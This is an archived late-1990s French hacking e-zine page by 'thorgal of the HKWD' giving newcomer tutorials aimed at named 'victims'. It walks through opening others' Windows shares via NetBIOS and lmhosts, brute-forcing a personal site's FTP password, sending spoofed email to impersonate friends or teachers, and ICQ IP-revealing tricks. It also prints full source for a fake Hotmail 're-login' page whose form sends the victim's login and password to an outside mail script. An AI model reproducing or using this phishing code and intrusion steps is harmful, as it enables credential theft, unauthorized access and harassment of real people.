<HTML>
<script language="javascript">
<!--
if(window == window.top)
{
var s='<HEAD><TITLE>            nnn    nn   oooooooo  zzzzzzz   eeeeeee   pppppppppp</TITLE></HEAD><FRAMESET ROWS="*,68"  FRAMEBORDER=1 FRAMESPACING=0><FRAME  src="'+window.location+'?" name="doc" FRAMESPACING=0 ><FRAME  src="/heberg/pub.htm?Time=923783227&Nom=hkwd&FRAME=1" name="pub" scrolling="no" FRAMEBORDER=1 FRAMESPACING=0  MARGINGHEIGTH=0  MARGINWIDTH=0></FRAMESET>';
document.write(s);
}
//-->
</script>
</HTML>
<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="Generator" content="Microsoft Word 97">
   <meta name="GENERATOR" content="Mozilla/4.5 [fr] (Win95; I) [Netscape]">
   <title>            nnn    nn   oooooooo  zzzzzzz   eeeeeee   pppppppppp</title>
</head>
<body>
<i><font face="Courier New">&nbsp;&nbsp;<font color="#666666">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
nnn&nbsp;&nbsp;&nbsp; nn&nbsp;&nbsp; oooooooo&nbsp; zzzzzzz&nbsp;&nbsp;
eeeeeee&nbsp;&nbsp; pppppppppp</font></font></i>
<br><i><font face="Courier New"><font color="#666666">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
nn n&nbsp;&nbsp; nn&nbsp;&nbsp; oooooooo&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
z&nbsp;&nbsp;&nbsp;&nbsp; ee&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
pp&nbsp;&nbsp;&nbsp;&nbsp; p</font></font></i>
<br><i><font face="Courier New"><font color="#666666">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
nn&nbsp; n&nbsp; nn&nbsp;&nbsp; oo&nbsp;&nbsp;&nbsp; oo&nbsp;&nbsp;&nbsp;&nbsp;
z&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; eeee&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ppppppp</font></font></i>
<br><i><font face="Courier New"><font color="#666666">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
nn&nbsp;&nbsp; n nn&nbsp;&nbsp; oooooooo&nbsp;&nbsp; z&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
ee&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; pp</font></font></i>
<br><i><font face="Courier New"><font color="#666666">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
nn&nbsp;&nbsp;&nbsp; nnn&nbsp;&nbsp; oooooooo&nbsp; zzzzzzzz&nbsp; eeeeeee&nbsp;&nbsp;
pp</font></font></i>
<br>&nbsp;
<br>&nbsp;
<p><i><font face="Courier New"><font color="#3333FF">je vous previens que
toutes les informations qui seront sur cet emag ne sont qu'as but informatif
et que tout ce que vous ferez avec ses informations ne poura me preoccuper.</font></font></i>
<p><i><u><font face="Courier New">Note: DLV = de la victime</font></u></i>
<p><b><u><font face="Courier New">1.les commandes netbios</font></u></b>
<p><b><u><font face="Courier New">2.quelques commandes ms dos</font></u></b>
<p><b><u><font face="Courier New">3.hacker un site perso(pour les newbies)</font></u></b>
<p><b><u><font face="Courier New">4.comment envoyer des emails anonyme
par telnet</font></u></b>
<p><b><u><font face="Courier New">5.comment hacker une boite email?</font></u></b>
<p><b><u><font face="Courier New">6.quelques trucs icq</font></u></b>
<p><b><u><font face="Courier New">7.ma version du hacker</font></u></b>
<p><b><u><font face="Courier New">8.fonder un clan</font></u></b>
<br>&nbsp;
<br>&nbsp;
<p><b><u><font face="Courier New">1.les commandes netbios:</font></u></b>
<p><font face="Courier New">Pour acceder aux commandes netbios il faut
d'abord editer un fichier qui s'appellera "lmhosts" (EN MINUXULE!!!!),
editer le fichier par l'editeur du dos pour y acceder taper "edit" dans
msdos.</font>
<p><font face="Courier New">Vous editer donc ce fichier dans : "c:\windows"</font>
<p><font face="Courier New">Bon le fichier a &eacute;t&eacute; editer que
faire?</font>
<p><font face="Courier New">tapez l commande suivante dans ms dos : nbtstat
-A ip"DLV" (DLV= De La Victime)</font>
<p><font face="Courier New">vous aller alors avoir le netbios "DLV" pour
savoir le nom du pc il faut qu'il y ai "unique" et il faut avoir le numero
"20" devant regarder :</font>
<br>&nbsp;
<p><font face="Courier New">C:\>nbtstat -A (ip DLV)</font>
<br>&nbsp;
<p><font face="Courier New">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; NetBIOS
Remote Machine Name Table</font>
<p><font face="Courier New">&nbsp;&nbsp; Name&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Type&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Status</font>
<br><font face="Courier New">---------------------------------------------</font>
<br><font face="Courier New">VICTIME&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&lt;00>&nbsp; <font color="#FF6600">UNIQUE</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Registered</font>
<br><font face="Courier New">FAMILLE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&lt;00>&nbsp; GROUP&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Registered</font>
<br><font face="Courier New">VICTIME&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
&lt;03>&nbsp; <font color="#FF6600">UNIQUE</font>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Registered</font>
<p><font face="Courier New">MAC Address = 44-45-00-69-31</font>
<p><font face="Courier New">C:\></font>
<br>&nbsp;
<p><font face="Courier New">Il y a bien unique dans&nbsp;&nbsp; "type"&nbsp;
mais il n'y as malheureusement pas de &lt;20> devant</font>
<br><font face="Courier New">;(</font>
<br><font face="Courier New">On saura pas le hacker.</font>
<br><font face="Courier New">Si au contraire il y as unique et&nbsp; &lt;20>&nbsp;
devant notez le nom et l'ip "DLV" sur une feuille.</font>
<p><font face="Courier New">Vous revenez ensuite dans l'editeur de ms dos
et vous ouvrez "lmhosts" vous notez dedans :</font>
<p><font face="Courier New">148.....(ip du mec) nom #PRE</font>
<p><font face="Courier New">Vous enregistrer</font>
<p><font face="Courier New">Puis revenez dans windows</font>
<p><font face="Courier New">-menu d&eacute;marrer</font>
<p><font face="Courier New">-rechercher</font>
<p><font face="Courier New">-ordinateur</font>
<p><font face="Courier New">Vous n'avez plus qu'as tapez le nom de l'ordinateur
"DLV" puis vous entrerez librement dans son pc.</font>
<p><font face="Courier New">Et oui pas besoins de trojans pour cela mais
si vous &ecirc;tes conserner il y as toujours moyen de s'en proteger, la
premiere protection consiste &agrave; restreindre l'acc&egrave;s aux ressources
de votre r&eacute;seau local en modifiant les propri&eacute;t&eacute;s
de</font>
<br><font face="Courier New">chaque ressource de ce r&eacute;seau. Par
exemple, pour interdire l'acc&egrave;s &agrave; votre disque dur C, cliquez
sur l'ic&ocirc;ne Poste de travail -</font>
<br><font face="Courier New">s&eacute;lectionnez le disque C -&nbsp; cliquez
avec le bouton droit de la souris et s&eacute;lectionnez Partage.</font>
<p><font face="Courier New">Vous pouvez ne pas partager le disque C, ou
le partager en lecture seule, en acc&egrave;s complet ou en acc&egrave;s
par mot de passe.</font>
<br><font face="Courier New">Dans le premier et troisi&egrave;me cas, indiquez
le mot de passe d'acc&egrave;s &agrave; votre disque C. Ainsi, les visiteurs
ind&eacute;licats devront</font>
<br><font face="Courier New">montrer patte blanche.</font>
<p><font face="Courier New">Voici une astuce tordue pour savoir si vous
avez un visiteur ind&eacute;licat. Si vous n'utilisez pas le lecteur de
disquette A pendant</font>
<br><font face="Courier New">vos acc&egrave;s &agrave; Internet, partagez-le
en acc&egrave;s complet et donnez-lui comme nom de partage PORNO-PICTS
par exemple. Les</font>
<br><font face="Courier New">hackers seront syst&eacute;matiquement attir&eacute;s
comme les mouches par le miel (ou moins rago&ucirc;tant, la m...). Donc,
si votre disque</font>
<br><font face="Courier New">A se met en action, vous avez tr&egrave;s
probablement un visiteur. Et pour conna&icirc;tre l'identit&eacute; du
visiteur, passez sous DOS et</font>
<br><font face="Courier New">tapez simplement netstat. L'adresse IP sera
tr&egrave;s probablement indiqu&eacute;e par son nom de r&eacute;seau.</font>
<p><font face="Courier New"><font color="#FF0000">ATTENTION ceci ne fonctionne
pas a tous les coup &ccedil;a fonctionne 1 fois sur 4 d'apr&egrave;s moi
mais au fur et a mesure que le temps avance cela deviens de plus en plus
r&acirc;re.</font></font>
<p><b><u><font face="Courier New">2.Quelques commandes ms dos</font></u></b>
<p><font face="Courier New">Voici quelques commandes ms dos et a quoi elle
servent:</font>
<p><b><i><font face="Courier New">netstat : sert a verifier si quelqu'un
essaye de rentrer dans ton pc il donnera ce qui suit :</font></i></b>
<p><font face="Courier New">C:\>netstat</font>
<p><font face="Courier New">Active Connections</font>
<p><font face="Courier New">Proto Local Address Foreign Address State</font>
<p><b><i><font face="Courier New">tracert www.url.com : pour tracer l'ip
(ou l'ip les ip qui sont proche) d'un serveur cela donnera ce qui suit
: (l'exemple est hotmail)</font></i></b>
<p><font face="Courier New">tracert www.hotmail.com</font>
<p><font face="Courier New">Tracing route to www.hotmail.com [209.185.130.253]</font>
<p><font face="Courier New">over a maximum of 30 hops:</font>
<p><font face="Courier New">1 235 ms 241 ms 296 ms tc10-ns.marais.belbone.net
[195.13.8.181]</font>
<p><font face="Courier New">2 282 ms 257 ms 286 ms cs7507-fe4-0-0.marais.belbone.net
[195.13.8.161]</font>
<p><font face="Courier New">3 205 ms 282 ms 376 ms 41.0.belbone.be [195.13.0.41]</font>
<p><font face="Courier New">4 466 ms 611 ms 501 ms borderx1-hssi4-0.NewYork.cw.net
[204.70.219.109]</font>
<p><font face="Courier New">5 449 ms 435 ms 496 ms core2-fddi-0.NewYork.cw.net
[204.70.219.49]</font>
<p><font face="Courier New">6 235 ms 419 ms 352 ms core4-hssi-5.Washington.cw.net
[204.70.1.246]</font>
<p><font face="Courier New">7 385 ms 442 ms 293 ms core3.WashingtonEast.cw.net
[204.70.9.49]</font>
<p><font face="Courier New">8 471 ms 435 ms 397 ms 216.32.173.157</font>
<p><font face="Courier New">9 196 ms 308 ms 348 ms dcr02-g11-0-0.hrnd01.exodus.net
[216.32.173.141]</font>
<p><font face="Courier New">10 391 ms 373 ms 390 ms bbr02-p0-0.hrnd01.exodus.net
[209.1.169.158]</font>
<p><font face="Courier New">11 424 ms 586 ms 417 ms bbr02-p5-0.sntc02.exodus.net
[216.32.173.13]</font>
<p><font face="Courier New">12 410 ms 358 ms 432 ms bbr02-p5-0.sntc03.exodus.net
[209.185.249.146]</font>
<p><font face="Courier New">13 356 ms 435 ms 436 ms hmr01-p6-0-0.sntc03.exodus.net
[209.185.249.210]</font>
<p><font face="Courier New">14 209.185.111.226 reports: Destination net
unreachable.</font>
<p><font face="Courier New">Trace complete.</font>
<p><b><i><font face="Courier New">ftp</font></i></b>
<br><b><i><font face="Courier New">open www.url.com : cela sert a acceder
au compte ftp d'un serveur mais il faux malheureusement avoir le nom d'utilisateur
et le mot de passe ;o( (vous pouvez toujours essayer de tracer le serveur
par "ws sping propack" vous verrez alors le nom d'utilisateur et pour le
mot de passe je ne peux rien pour vous!) l'exemple est avec finetprint:</font></i></b>
<p><font face="Courier New">C:\>ftp</font>
<p><font face="Courier New">ftp> open www.finetprint.com</font>
<p><font face="Courier New">Connected to ns3.inside-interactive.net.</font>
<p><font face="Courier New">220 ns0.inside-interactive.net FTP server (Version
6.00) ready.</font>
<p><font face="Courier New">User (ns3.inside-interactive.net:(none)):</font>
<p><font face="Courier New">331 Password required for (none).</font>
<p><font face="Courier New">Password:</font>
<p><font face="Courier New">530 Login incorrect.</font>
<p><font face="Courier New">Login failed.</font>
<p><font face="Courier New">ftp></font>
<br>&nbsp;
<p><font face="Courier New">il y en a pleins d'autres mais pour moi celle
ci sont les principales avec le netbios.</font>
<br>&nbsp;
<p><b><u><font face="Courier New">3.hacker un site perso(pour les newbies)</font></u></b>
<p><font face="Courier New">Je vais vous apprendre la methode pour cracker
le pass de ce site</font>
<br><font face="Courier New">Pour ce chapitre vous devrez vous munir de:</font>
<br><font face="Courier New">_un brute force et specialement "Vcrackftp"</font>
<br><font face="Courier New">_un dico</font>
<p><font face="Courier New">Ouvrez&nbsp;&nbsp; "Vcrackftp"</font>
<br><font face="Courier New">Dans&nbsp; "host"&nbsp; vous mettez le nom
du serveur</font>
<br><font face="Courier New">ex si le site est:&nbsp; www.multimania.com/victime</font>
<br><font face="Courier New">Vous metterez&nbsp;&nbsp; "www.multimania.com"&nbsp;
dans host</font>
<br><font face="Courier New">Vous mettez&nbsp;&nbsp; "victime"&nbsp;&nbsp;&nbsp;
dans user</font>
<br><font face="Courier New">Vous laissez le port 21</font>
<br><font face="Courier New">Dans password vous selectionnez le dico de
votre choix (un programme les fais sois m&ecirc;me par le dos (ce prog
s'appelle dikmaker))</font>
<br><font face="Courier New">vous pressez sur go et cela tournera tout
seul.</font>
<br><font face="Courier New">Il va mettre le bon password dans la colonne
de droite.</font>
<br><font face="Courier New">Pas tres compliquer hein</font>
<br><font face="Courier New">;o)</font>
<p><font face="Courier New"><font color="#FF0000">ATTENTION: cette technique
ne fonctionne pas sur tout les erveurs donc ne vous etonnez pas si il est
mis wondows socket error dans un message d'erreur</font></font>
<br>&nbsp;
<p><b><u><font face="Courier New">4. Comment envoyer des emails anonymes
par telnet?</font></u></b>
<p><b><i><font face="Courier New">Bon</font></i></b>
<p><b><i><font face="Courier New">D'abord connecter vous a un serveur mal
proteger (il y en a plein) ex: www.finetprint.com</font></i></b>
<p><b><i><font face="Courier New">sur le port 25 type de terminal : vt52</font></i></b>
<p><b><i><font face="Courier New">En voici les commandes</font></i></b>
<p><font face="Courier New">helo www.url.com (l&agrave; ou le gars est
heberger)</font>
<p><font face="Courier New">mail from : faux@bleuf.com</font>
<p><font face="Courier New">rcpt to : victime@url.com</font>
<p><font face="Courier New">data</font>
<p><font face="Courier New">puis vous tapez votre message</font>
<p><font face="Courier New">"." (le point est important pour le mail envoyer)</font>
<br><font face="Courier New">tapez&nbsp;&nbsp; "enter"</font>
<br>&nbsp;
<br>&nbsp;
<p><font face="Courier New">Et voila le mess est envoyer</font>
<p><font face="Courier New">A quoi &ccedil;a sert et quel sont les inconveniants?</font>
<p><font face="Courier New">Si votre copain vous fait chier vous le choquer
ou imiter un de ses ami en disant que vous voulez plus lui parler etc etc</font>
<p><font face="Courier New">L'inconvenient est qu'on peux toujours voir
ton ip dans l'email n'oublier pas le helo www.url.com comme &ccedil;a le
serveur aura confiance en vous!</font>
<p><font face="Courier New">Ne deconner pas trop avec &ccedil;a en envoyer
des truc en employant l'email de votre prof car si il est severe il ira
se plaindre et on a toujours moyen de vous tracer parce que l'ip est log&eacute;
dans les infos de l'email envoy&eacute;.</font>
<br>&nbsp;
<p><b><u><font face="Courier New,Courier">5.Comment hacker une boite email?</font></u></b>
<p><font face="Courier New,Courier">Tout d'abord ce hack est plut&ocirc;t
un pi&egrave;ge &agrave; cons qu'un hack pur et dur sous telnet ! Ensuite
il se limite aux boites E-Mail</font>
<br><font face="Courier New,Courier">accessibles par le web (hotmail, caramail,
francemail ,etc etc.....) .</font>
<br><font face="Courier New,Courier">Il faut que les E-Mail re&ccedil;us
puissent &ecirc;tre vus en HTML.</font>
<p><font face="Courier New,Courier">Comment fonctionne le pi&egrave;ge
&agrave; cons ?</font>
<br><font face="Courier New,Courier">Ceci n'est pas tr&egrave;s compliqu&eacute;:
on envoie un E-Mail qui contient du HTML qui lui-m&ecirc;me contient du
JavaScript (tu suis ?).</font>
<br><font face="Courier New,Courier">Dans le javascript, on r&eacute;cup&egrave;re
une page qui imite la mise-en-page de "hotmail" et qui dit de se relogger.
Le gars se</font>
<br><font face="Courier New,Courier">relogge et transmet sans le savoir
&agrave; une boite E-Mail de Geocities son mot de passe, son login et son
adresse IP en</font>
<br><font face="Courier New,Courier">envoyant le formulaire !</font>
<p><font face="Courier New,Courier">Et oui je vous faciliterais la tache
en vous donnant le code source</font>
<br><font face="Courier New,Courier">Comme je suis sympas voici le code
source:</font>
<p><font face="Courier New,Courier">&lt;html>&lt;head>&lt;/head></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;body
bgcolor="#ffffff" link="#000099" vlink="#000099"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;table
border=0 cellpadding=5 cellspacing=5 width=508 height=90%></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr
valign=middle>&lt;th colspan=2></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font
face="Arial, Helvetica" size="5">We're Sorry, We Cannot&lt;br></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Process
Your Request&lt;/font></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/th>&lt;/tr></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr
valign=middle>&lt;td align=center></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font
face="Arial, Helvetica" size="3">Reason:&amp;nbsp;&lt;/font></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font
face="Arial, Helvetica" size="3" color="#ff0000">&lt;b>Time&nbsp; expired
for your account. Please</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; re-login.&lt;/b>&lt;/font>&lt;br></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/td>&lt;/tr></font>
<br><font face="Courier New,Courier">&lt;tr valign="middle">&lt;td align="center"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;FORM
METHOD="POST" NAME="hotmail"</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ACTION="http://www.univox.com/cgi-bin/mail/Mail.cgi"</font>
<br><font face="Courier New,Courier">target="_parent"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT
TYPE="hidden" NAME="recipient"</font>
<br><font face="Courier New,Courier">VALUE="user_guest@hotmail.com"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT
TYPE="hidden" NAME="subject" VALUE="Hotmail Password"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;INPUT
TYPE="hidden" NAME="return_link_url"</font>
<br><font face="Courier New,Courier">VALUE="http://www.hotmail.com/cgi-bin/start/"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;table
cellpadding="0" cellspacing="5" border="0"></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr>&lt;td>&lt;font
face="Arial, Helvetica" size="2">Login</font>
<br><font face="Courier New,Courier">Name:&lt;/font>&lt;br>&lt;input</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; type="text"
name="login" size="16" maxlength="16">&lt;/td>&lt;td>&lt;font</font>
<br><font face="Courier New,Courier">face="Arial,</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Helvetica"
size="2">Password:&lt;/font>&lt;br>&lt;input type="password"</font>
<br><font face="Courier New,Courier">name="passwd"</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; size="16"
maxlength="16">&amp;nbsp;&lt;input type="submit"</font>
<br><font face="Courier New,Courier">value="Enter">&lt;/td>&lt;tr></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/table>&lt;/FORM>&lt;/td>&lt;/tr></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;tr
valign=middle>&lt;th colspan=2 align=center></font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;font
face="Arial, Helvetica" size="3">Return to &lt;a</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; href="http://www.hotmail.com"</font>
<br><font face="Courier New,Courier">target="_parent">Hotmail's Homepage&lt;/a>.</font>
<br><font face="Courier New,Courier">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; &lt;/font>&lt;/th>&lt;/tr>&lt;/table></font>
<br><font face="Courier New,Courier">&lt;font size=2 color=black>1996-1999.
Hotmail&copy; all rights reserved.&lt;/font></font>
<p><font face="Courier New,Courier">&nbsp; Si c'est pour une autre boite
email changer hotmail en la&nbsp; boite!!</font>
<br>&nbsp;
<br>&nbsp;
<p><b><u><font face="Courier New">6.quelques trucs icq</font></u></b>
<p><u><font face="Courier New,Courier">6.1 comment spoofer son ip d'icq
sans programme?</font></u>
<p><font face="Courier New">Pour cela vous avez juste besoin de 5 choses</font>
<p><font face="Courier New">-icq</font>
<p><font face="Courier New">-icq</font>
<p><font face="Courier New">-icq</font>
<p><font face="Courier New">-icq</font>
<p><font face="Courier New">-icq</font>
<p><font face="Courier New">Voila essayez d'avoir tous le materiel necesaire
ou si non cela n'ira pas ;o))))))</font>
<p><font face="Courier New">Prenez l'ip de quelqu'un ;</font>
<p><font face="Courier New">aller dans</font>
<p><font face="Courier New">-icq</font>
<p><font face="Courier New">-preferences</font>
<p><font face="Courier New">-serveur</font>
<p><font face="Courier New">et changer le serveur qui est noter</font>
<p><font face="Courier New">icq.mirabilis.com</font>
<p><font face="Courier New">et laisser icq1.mirabilis.com</font>
<p><font face="Courier New">Apres cela deconencter vous d'icq et reconnectez
vous apres!</font>
<p><font face="Courier New">aller dans securiti privacy et enlever</font>
<p><font face="Courier New">do not ip publish!</font>
<p><font face="Courier New">Le tour est jouer!!!!!!!!</font>
<p><font face="Courier New"><font color="#FF0000">ATTENTION: cette astuce
fonctionne rarement mais &ccedil;a vaux le coup d'essayer.</font></font>
<p><font face="Courier New"><font color="#FF0000">l.N'oubliez pas de prendre
note des anciens serveurs au cas ou icq ne voudrait pas se reconnecter.</font></font>
<p><u><font face="Courier New">6.2 Comment reperer quelqu'un qui joue avec
multiicq?</font></u>
<p><font face="Courier New">Il va venter son autre nick par ex si je m'appelle
nozep je vais dire:</font>
<p><font face="Courier New"><b>nozep </b>: tu connais thorgal?</font>
<p><font face="Courier New"><b>victime </b>: oui je l'ai dans ma liste</font>
<p><font face="Courier New"><b>nozep </b>: c'est le meilleur hacker que
je connaisse il sais tous faire</font>
<p><font face="Courier New"><b>victime</b> : a ouai! c cool &ccedil;a!!!!</font>
<p><font face="Courier New"><b>Nozep</b> : c'est lui qui m'as tout apris</font>
<p><font face="Courier New"><b>victime</b> : vraiment?</font>
<p><font face="Courier New"><b>nozep </b>: si je te le dis!</font>
<p><font face="Courier New"><b>nozep</b> : comment tu le trouve toi?</font>
<p><font face="Courier New"><b>victime </b>: je lui ai jamais vraiment
parler mais il n'as pas l'air tres sociable!</font>
<p><font face="Courier New"><b>victime</b> : tu crois qu'il voudra m'apprendre?</font>
<p><font face="Courier New"><b>nozep</b> : non, tu est trop nul pour lui
cela mettera trop de temps!</font>
<p><font face="Courier New">..........</font>
<p><i><font face="Courier New">voil&agrave;</font></i>
<p><i><font face="Courier New">ensuite si c'est un de vos amis il va vous
questionner ex:</font></i>
<p><font face="Courier New"><b>nozep </b>: salut je suis le pire ennemi
de thorgal c vraiment le plus con des cons</font>
<p><font face="Courier New"><b>victime</b> : ha bon</font>
<p><font face="Courier New"><b>nozep</b> : qu'est ce que tu en trouve toi?</font>
<p><font face="Courier New"><b>victime </b>: ben &ccedil;a va quoi il est
pas chiant avec moi!</font>
<p><font face="Courier New"><b>nozep </b>: il ne t'as jamais fait de sale
coup?</font>
<p><font face="Courier New"><b>victime</b> : oui il m'as hacker mon site
cet enculer!!</font>
<p><font face="Courier New"><b>nozep </b>: tu veux le hacker avec moi?</font>
<p><font face="Courier New"><b>victime</b> : il en saura rien que c'est
moi hein??</font>
<p><font face="Courier New"><b>nozep</b> : t'en fait pas je metterai tous
sur mon dos</font>
<p><font face="Courier New"><b>victime </b>: ok pas de prob alors , on
commence maintenant?</font>
<p><font face="Courier New"><b>nozep</b> : ok!</font>
<p><font face="Courier New">...........</font>
<p><font face="Courier New">La seule fa&ccedil;on de verifier si ce gars
vous le connaissez c'est de regarder l'ip qui sera forcement le m&ecirc;me
a part si il a ete spoofer(si c'est le cas essayer de decouvrir qui c'est!)</font>
<p><font face="Courier New">Si c'est le m&ecirc;me ip jouer le jeu</font>
<p><font face="Courier New">;o)</font>
<p><font face="Courier New">Vous verrez comme les gens sont faux cul quelques
fois!</font>
<p><font face="Courier New">j'ai un peu exagerer sur ce texte mais comme
&ccedil;a vous saurai a quoi vous en tenir!</font>
<p><u><font face="Courier New">6.3 Comment trouver un ip qui n'est pas
montrer sur icq sans programme?</font></u>
<br>&nbsp;
<p><font face="Courier New,Courier"><font color="#000000">Pour faire cela
c'est bien facile! ce truc ne marche cependant que avec icq 98</font></font>
<br><font face="Courier New,Courier"><font color="#000000">;o(</font></font>
<br><font face="Courier New,Courier"><font color="#000000">Vous regarder
dans les infos de quelqu'un et il ne montre pas son ip</font></font>
<br><font face="Courier New,Courier"><font color="#000000">;o(</font></font>
<br><font face="Courier New,Courier"><font color="#000000">vous penser
directement a votre sniffer mais il vous viens a l'esprit que vous l'vez
virusser il y as pas longtemps</font></font>
<br><font face="Courier New,Courier"><font color="#000000">Et bien vous
rester sur le gars en question</font></font>
<br><font face="Courier New,Courier"><font color="#000000">Vous mettez
la fleur rouge sur icq (donc vous vous deconnecter d'icq) et vous n'avez
plus qu'as</font></font>
<br><font face="Courier New,Courier"><font color="#000000">regarder dans
les infos du gars!</font></font>
<br><font face="Courier New,Courier"><font color="#000000">c cool non?</font></font>
<br><font face="Courier New,Courier"><font color="#000000">Ceci fonctionne
a out les coup et donne toujours le bon ip!!!</font></font>
<br><font face="Courier New,Courier"><font color="#000000">cependant il
faut avoir la version d'icq 98!</font></font>
<br>&nbsp;
<br>&nbsp;
<p><b><u><font face="Courier New">7. Ma version du hacker</font></u></b>
<p><font face="Courier New">Pour moi un hacker c'est quelqu'un qui sais
hacker sans se servir des programme des autres , par les moyens qu'il a</font>
<p><font face="Courier New">PoUR MOi Ce Ne SOnT Pas L3s HAck3Rs QuI eCRiV3Nt
COMme &ccedil;A MaIS BiEN LeS LaMM3rS De M3Rd3s.</font>
<p><font face="Courier New">Un hacker essaye de ne pas se faire remarquer
car d&egrave;s qu'il se vantent de ses capacit&eacute;es de hacking les
autres personnes le traite de delinquant d'internet , ce qui lui retire
toute leur confiance.</font>
<p><font face="Courier New">Il s'interesse aux moins fort, lui apprend
des trucs pour qu'ils le respectent, pour qu'il le prennent pour son ma&icirc;tre,
il n'exagere pas la dessus, ce jeux est tres dangereux quand le lammer
s'aper&ccedil;oit que vous &ecirc;tes un esti de lammer pire que lui(lol)</font>
<p><font face="Courier New"><font color="#FF0000">ATTENTION: il ne faut
pas confondre hacker et crascher</font></font>
<p><font face="Courier New">la difference entre un hacker et un crascher
est la mentaliter</font>
<p><font face="Courier New">un hacker hack pour decouvrir les failles d'un
symst&egrave;me et doit avoir une raison valable pour hacker tandis qu'un
crascher s'amuse a peter les syst&egrave;me et les pc sans raisons</font>
<p><font face="Courier New">en g&eacute;n&eacute;ral les crascher sont
detester dans le monde du piratage informatique.</font>
<p><b><u><font face="Courier New">8. fonder un clan:</font></u></b>
<p><font face="Courier New">Reflechissez bien avant de fonder un clan,
soyer une elite vous m&ecirc;me et tester chancun de vos membres chaque
moi</font>
<p><font face="Courier New">&ecirc;tre une elite ce n'est pas hacker par
le socket ou BO (les trojans pour moi c'est la honte a l'etat PUR si vous
ne faites que cela un bon conseil</font>
<p><font face="Courier New">lisez pleins de magazines de hacking pour apprendre
et au fur et a mesure les trojans ne vous servirons a rien, a part en cas
d'urgence!</font>
<p><font face="Courier New">mais bon</font>
<p><font face="Courier New">si vous &ecirc;tes un lammer et que vous enguager
des lammer ce clan sera pouris!Croyer en mon experience.</font>
<p><font face="Courier New">Les vrai elites vont se rebeller contre vous,
vous serez tester et jet&eacute;, les membre seront inactif car il n'y
as pas d'autorit&eacute;e dans votre clan</font>
<p><font face="Courier New">attendez 2 semaines pour bien y reflechir!</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face="Courier New">Voil&agrave; cet emag est terminer c'est
le premier de la serie et ce ne sera pas le dernier!!</font></b>
<p><font face="Courier New"><font color="#000099">by thorgal of the "HKWD"</font></font>
